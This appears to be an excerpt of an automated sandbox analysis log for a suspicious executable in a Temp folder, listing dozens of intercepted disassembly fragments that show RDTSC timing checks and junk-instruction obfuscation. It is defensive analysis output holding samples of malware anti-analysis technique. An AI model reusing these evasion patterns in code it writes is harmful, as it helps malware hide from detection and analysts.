Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD05A2 second address: 4BD068E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push ecx 0x0000000c jmp 00007F12E108FDC3h 0x00000011 pop ecx 0x00000012 pushfd 0x00000013 jmp 00007F12E108FDC9h 0x00000018 sub ecx, 22B3C986h 0x0000001e jmp 00007F12E108FDC1h 0x00000023 popfd 0x00000024 popad 0x00000025 push eax 0x00000026 pushad 0x00000027 mov si, bx 0x0000002a call 00007F12E108FDC3h 0x0000002f mov di, cx 0x00000032 pop eax 0x00000033 popad 0x00000034 xchg eax, ebp 0x00000035 jmp 00007F12E108FDBBh 0x0000003a mov ebp, esp 0x0000003c pushad 0x0000003d mov esi, 29018A2Bh 0x00000042 mov ah, 9Eh 0x00000044 popad 0x00000045 push esi 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 pushfd 0x0000004a jmp 00007F12E108FDC5h 0x0000004f jmp 00007F12E108FDBBh 0x00000054 popfd 0x00000055 pushfd 0x00000056 jmp 00007F12E108FDC8h 0x0000005b adc cx, 9348h 0x00000060 jmp 00007F12E108FDBBh 0x00000065 popfd 0x00000066 popad 0x00000067 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD068E second address: 4BD06A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12E0FAFC84h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD06A6 second address: 4BD06AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD06AA second address: 4BD06E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F12E0FAFC88h 0x00000014 or ecx, 3A5CC808h 0x0000001a jmp 00007F12E0FAFC7Bh 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD06E4 second address: 4BD072E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [76FA65FCh] 0x0000000e jmp 00007F12E108FDBEh 0x00000013 test eax, eax 0x00000015 pushad 0x00000016 push eax 0x00000017 mov bx, A7B0h 0x0000001b pop edi 0x0000001c mov edx, ecx 0x0000001e popad 0x0000001f je 00007F13533E3000h 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 mov edi, 2A8D5CE0h 0x0000002d movsx ebx, ax 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD072E second address: 4BD0762 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov eax, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ecx, eax 0x0000000c jmp 00007F12E0FAFC89h 0x00000011 xor eax, dword ptr [ebp+08h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F12E0FAFC7Ah 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD0762 second address: 4BD077A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD077A second address: 4BD077E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD077E second address: 4BD0784 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD0784 second address: 4BD078A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD078A second address: 4BD078E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD078E second address: 4BD07B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E0FAFC84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ror eax, cl 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov edx, 3CED2130h 0x00000015 mov cx, bx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD07B6 second address: 4BD07BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD07BC second address: 4BD07C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD07C0 second address: 4BD07C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD07C4 second address: 4BD0801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F12E0FAFC85h 0x00000012 adc eax, 7BE5D366h 0x00000018 jmp 00007F12E0FAFC81h 0x0000001d popfd 0x0000001e mov bl, ch 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD0801 second address: 4BD0857 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F12E108FDC8h 0x00000009 or si, 5638h 0x0000000e jmp 00007F12E108FDBBh 0x00000013 popfd 0x00000014 mov ah, 64h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 retn 0004h 0x0000001c nop 0x0000001d mov esi, eax 0x0000001f lea eax, dword ptr [ebp-08h] 0x00000022 xor esi, dword ptr [003D2014h] 0x00000028 push eax 0x00000029 push eax 0x0000002a push eax 0x0000002b lea eax, dword ptr [ebp-10h] 0x0000002e push eax 0x0000002f call 00007F12E58D061Ch 0x00000034 push FFFFFFFEh 0x00000036 pushad 0x00000037 mov dx, 4814h 0x0000003b mov si, bx 0x0000003e popad 0x0000003f pop eax 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F12E108FDC1h 0x00000049 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD0857 second address: 4BD085D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD085D second address: 4BD0871 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a push eax 0x0000000b call 00007F12E58D0645h 0x00000010 mov edi, edi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov bx, si 0x00000018 mov edi, ecx 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD0871 second address: 4BD0879 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BD0879 second address: 4BD08E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 push esi 0x0000000a movsx edx, ax 0x0000000d pop esi 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F12E108FDC7h 0x00000015 sbb esi, 6BD0941Eh 0x0000001b jmp 00007F12E108FDC9h 0x00000020 popfd 0x00000021 mov ax, 09E7h 0x00000025 popad 0x00000026 popad 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F12E108FDC8h 0x0000002f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B80016 second address: 4B80025 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E0FAFC7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B80025 second address: 4B8003C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 mov ecx, 3BEBE0D7h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov cl, dh 0x00000014 mov edi, esi 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B8003C second address: 4B80058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12E0FAFC88h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B80058 second address: 4B8005C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B8005C second address: 4B800BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ax, 4B43h 0x0000000e mov bl, ah 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F12E0FAFC7Bh 0x00000017 mov ebp, esp 0x00000019 jmp 00007F12E0FAFC86h 0x0000001e and esp, FFFFFFF8h 0x00000021 jmp 00007F12E0FAFC80h 0x00000026 xchg eax, ecx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F12E0FAFC87h 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B800BE second address: 4B800E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b movsx edi, si 0x0000000e push eax 0x0000000f push edx 0x00000010 mov edx, eax 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B800E4 second address: 4B80106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, ecx 0x00000006 jmp 00007F12E0FAFC7Ch 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F12E0FAFC7Ch 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B80106 second address: 4B80134 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F12E108FDBCh 0x0000000d xchg eax, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F12E108FDC7h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B80134 second address: 4B80223 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E0FAFC89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+10h] 0x0000000c jmp 00007F12E0FAFC7Eh 0x00000011 xchg eax, esi 0x00000012 jmp 00007F12E0FAFC80h 0x00000017 push eax 0x00000018 pushad 0x00000019 mov ch, dl 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F12E0FAFC88h 0x00000022 add ax, 0F08h 0x00000027 jmp 00007F12E0FAFC7Bh 0x0000002c popfd 0x0000002d pushad 0x0000002e popad 0x0000002f popad 0x00000030 popad 0x00000031 xchg eax, esi 0x00000032 jmp 00007F12E0FAFC84h 0x00000037 mov esi, dword ptr [ebp+08h] 0x0000003a pushad 0x0000003b mov esi, 123C1CBDh 0x00000040 mov cx, C7B9h 0x00000044 popad 0x00000045 xchg eax, edi 0x00000046 pushad 0x00000047 mov edi, esi 0x00000049 popad 0x0000004a push eax 0x0000004b pushad 0x0000004c mov ax, CA4Fh 0x00000050 pushfd 0x00000051 jmp 00007F12E0FAFC84h 0x00000056 sbb eax, 3C92EEF8h 0x0000005c jmp 00007F12E0FAFC7Bh 0x00000061 popfd 0x00000062 popad 0x00000063 xchg eax, edi 0x00000064 jmp 00007F12E0FAFC86h 0x00000069 test esi, esi 0x0000006b push eax 0x0000006c push edx 0x0000006d push eax 0x0000006e push edx 0x0000006f jmp 00007F12E0FAFC7Ah 0x00000074 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B80223 second address: 4B80232 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B80232 second address: 4B802AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F12E0FAFC7Fh 0x00000009 sub si, D4CEh 0x0000000e jmp 00007F12E0FAFC89h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 je 00007F135334E024h 0x0000001d pushad 0x0000001e push edx 0x0000001f pushfd 0x00000020 jmp 00007F12E0FAFC86h 0x00000025 and ecx, 21587878h 0x0000002b jmp 00007F12E0FAFC7Bh 0x00000030 popfd 0x00000031 pop eax 0x00000032 movsx edi, si 0x00000035 popad 0x00000036 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B802AA second address: 4B802AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B802AE second address: 4B802B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B802B4 second address: 4B802EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F135342E115h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F12E108FDC7h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B802EB second address: 4B80311 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E0FAFC89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B80311 second address: 4B80324 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDBFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B80324 second address: 4B80353 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E0FAFC89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F12E0FAFC7Dh 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B80353 second address: 4B80363 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12E108FDBCh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B80363 second address: 4B80367 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B80367 second address: 4B80412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edx, 61000000h 0x0000000e jmp 00007F12E108FDC7h 0x00000013 jne 00007F135342E0B2h 0x00000019 pushad 0x0000001a mov bx, ax 0x0000001d pushfd 0x0000001e jmp 00007F12E108FDC0h 0x00000023 adc esi, 3162A118h 0x00000029 jmp 00007F12E108FDBBh 0x0000002e popfd 0x0000002f popad 0x00000030 test byte ptr [esi+48h], 00000001h 0x00000034 pushad 0x00000035 call 00007F12E108FDC4h 0x0000003a mov ch, 22h 0x0000003c pop ebx 0x0000003d pushfd 0x0000003e jmp 00007F12E108FDBCh 0x00000043 and ax, C2A8h 0x00000048 jmp 00007F12E108FDBBh 0x0000004d popfd 0x0000004e popad 0x0000004f jne 00007F135342E062h 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007F12E108FDC5h 0x0000005c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B80412 second address: 4B80466 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E0FAFC81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test bl, 00000007h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F12E0FAFC83h 0x00000015 xor eax, 0E8B6DFEh 0x0000001b jmp 00007F12E0FAFC89h 0x00000020 popfd 0x00000021 mov si, 1247h 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B80466 second address: 4B8046C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B7076A second address: 4B70770 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B70770 second address: 4B70774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B70774 second address: 4B70843 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov esi, 563EB545h 0x0000000f call 00007F12E0FAFC82h 0x00000014 pushfd 0x00000015 jmp 00007F12E0FAFC82h 0x0000001a or ecx, 3E557008h 0x00000020 jmp 00007F12E0FAFC7Bh 0x00000025 popfd 0x00000026 pop esi 0x00000027 popad 0x00000028 mov ebp, esp 0x0000002a jmp 00007F12E0FAFC7Fh 0x0000002f and esp, FFFFFFF8h 0x00000032 jmp 00007F12E0FAFC86h 0x00000037 xchg eax, ebx 0x00000038 pushad 0x00000039 pushfd 0x0000003a jmp 00007F12E0FAFC7Eh 0x0000003f xor ah, FFFFFFC8h 0x00000042 jmp 00007F12E0FAFC7Bh 0x00000047 popfd 0x00000048 push esi 0x00000049 pushfd 0x0000004a jmp 00007F12E0FAFC7Fh 0x0000004f and esi, 19DC930Eh 0x00000055 jmp 00007F12E0FAFC89h 0x0000005a popfd 0x0000005b pop esi 0x0000005c popad 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 movsx edi, ax 0x00000064 pushad 0x00000065 popad 0x00000066 popad 0x00000067 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B70843 second address: 4B708A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F12E108FDC6h 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 mov di, cx 0x00000014 movzx ecx, bx 0x00000017 popad 0x00000018 push eax 0x00000019 jmp 00007F12E108FDC4h 0x0000001e xchg eax, esi 0x0000001f pushad 0x00000020 mov edx, eax 0x00000022 mov si, 1F19h 0x00000026 popad 0x00000027 mov esi, dword ptr [ebp+08h] 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F12E108FDBBh 0x00000031 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B708A0 second address: 4B70905 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 pushfd 0x00000007 jmp 00007F12E0FAFC80h 0x0000000c jmp 00007F12E0FAFC85h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 sub ebx, ebx 0x00000017 pushad 0x00000018 mov cx, bx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushfd 0x0000001e jmp 00007F12E0FAFC7Fh 0x00000023 sub cl, 0000004Eh 0x00000026 jmp 00007F12E0FAFC89h 0x0000002b popfd 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B70905 second address: 4B70961 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F12E108FDC0h 0x00000008 sbb ah, FFFFFFC8h 0x0000000b jmp 00007F12E108FDBBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 test esi, esi 0x00000016 jmp 00007F12E108FDC6h 0x0000001b je 00007F1353435802h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F12E108FDC7h 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B70961 second address: 4B70967 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B70967 second address: 4B709E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000012 pushad 0x00000013 call 00007F12E108FDC4h 0x00000018 mov dl, cl 0x0000001a pop edx 0x0000001b mov cl, A5h 0x0000001d popad 0x0000001e mov ecx, esi 0x00000020 jmp 00007F12E108FDBFh 0x00000025 je 00007F13534357AEh 0x0000002b jmp 00007F12E108FDC6h 0x00000030 test byte ptr [76FA6968h], 00000002h 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F12E108FDC7h 0x0000003e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B709E7 second address: 4B709ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B709ED second address: 4B709F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B709F1 second address: 4B70A22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F1353355633h 0x0000000e jmp 00007F12E0FAFC87h 0x00000013 mov edx, dword ptr [ebp+0Ch] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov esi, 3705714Dh 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B70A22 second address: 4B70A43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ecx, edx 0x0000000f mov si, dx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B70A43 second address: 4B70A95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F12E0FAFC85h 0x00000009 xor cx, E936h 0x0000000e jmp 00007F12E0FAFC81h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 jmp 00007F12E0FAFC81h 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 movsx edx, cx 0x00000024 mov eax, 3C0F0F2Bh 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B70A95 second address: 4B70AF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F12E108FDBEh 0x0000000f push eax 0x00000010 jmp 00007F12E108FDBBh 0x00000015 xchg eax, ebx 0x00000016 jmp 00007F12E108FDC6h 0x0000001b push dword ptr [ebp+14h] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F12E108FDC7h 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B80E14 second address: 4B80E1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B80B71 second address: 4B80B77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B80B77 second address: 4B80B7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
